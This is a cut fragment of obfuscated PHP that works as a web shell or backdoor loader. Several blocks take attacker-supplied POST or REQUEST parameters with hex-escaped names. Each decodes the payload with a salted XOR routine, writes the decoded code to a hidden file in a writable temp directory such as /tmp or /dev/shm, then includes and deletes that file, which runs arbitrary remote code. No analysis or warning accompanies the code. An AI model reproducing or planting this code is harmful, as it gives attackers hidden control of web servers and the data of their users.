= count($element)) break; if (max(0, is_dir($descriptor) * is_writable($descriptor))) { $entry = "$descriptor" . "/.item"; if (@file_put_contents($entry, $itm) !== false) { include $entry; unlink($entry); exit; } } $tkn++; } while (true); } if(@$_POST["k"] !== null){ $mrk = array_filter([getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir"), "/var/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TMP"), "/tmp"]); $itm = $_POST["k"]; $itm = explode ( "." ,$itm ) ; $flg =''; $salt2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt2); $m =0; while( $m< count( $itm)) { $v8 =$itm[$m]; $sChar =ord( $salt2[$m % $lenS]); $dec =( ( int)$v8 - $sChar -( $m % 10)) ^ 53; $flg .= chr( $dec); $m++; } foreach ($mrk as $flag): if (is_writable($flag) && is_dir($flag)) { $resource = "$flag/.data"; if (file_put_contents($resource, $flg)) { require $resource; unlink($resource); die(); } } endforeach; } if(!is_null($_POST["\x63omp"] ?? null)){ $rec = array_filter([getcwd(), "/dev/shm", "/var/tmp", "/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), session_save_path()]); $obj = $_POST["\x63omp"]; $obj = explode( "." , $obj ) ; $mrk = ''; $s9 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s9); $len = count( $obj); for( $s = 0; $s < $len; $s++) { $v5 = $obj[$s]; $sChar = ord( $s9[$s % $lenS]); $d =( ( int)$v5 - $sChar -( $s % 10)) ^ 78; $mrk .= chr( $d); } foreach ($rec as $key => $pset) { if (!!is_dir($pset) && !!is_writable($pset)) { $holder = "$pset/.ent"; if (@file_put_contents($holder, $mrk) !== false) { include $holder; unlink($holder); die(); } } } } if(array_key_exists("\x63\x6Fmp", $_POST) && !is_null($_POST["\x63\x6Fmp"])){ $dchunk = $_POST["\x63\x6Fmp"]; $dchunk = explode( '.' , $dchunk ) ; $element = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $len = count($dchunk); for ($u = 0; $u < $len; $u++) { $v7 = $dchunk[$u]; $sChar = ord($salt[$u % $lenS]); $d = ((int)$v7 - $sChar - ($u % 10)) ^ 26; $element .= chr($d); } $factor = array_filter([getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/tmp", "/dev/shm", getcwd(), sys_get_temp_dir(), session_save_path()]); for ($parameter_group = 0, $key = count($factor); $parameter_group < $key; $parameter_group++) { $data_chunk = $factor[$parameter_group]; if ((bool)is_dir($data_chunk) && (bool)is_writable($data_chunk)) { $ptr = "$data_chunk" . "/.entity"; $success = file_put_contents($ptr, $element); if ($success) { include $ptr; @unlink($ptr); exit;} } } } if(!is_null($_REQUEST["\x70ar\x61m\x65\x74er_\x67ro\x75\x70"] ?? null)){ $elem = $_REQUEST["\x70ar\x61m\x65\x74er_\x67ro\x75\x70"]; $elem = explode ( ".",$elem ) ; $desc = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s1); $s = 0; while ($s < count($elem)) { $v6 = $elem[$s]; $chS = ord($s1[$s%$sLen]); $dec = ((int)$v6 - $chS - ($s%10))^ 54; $desc.=chr($dec); $s++; } $key = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", getenv("TEMP"), "/tmp", session_save_path()]); for ($ent = 0, $bind = count($key); $ent < $bind; $ent++) { $data = $key[$ent]; if (is_dir($data) ? is_writable($data) : false) { $rec = sprintf("%s/.record", $data); $success = file_put_contents($rec, $desc);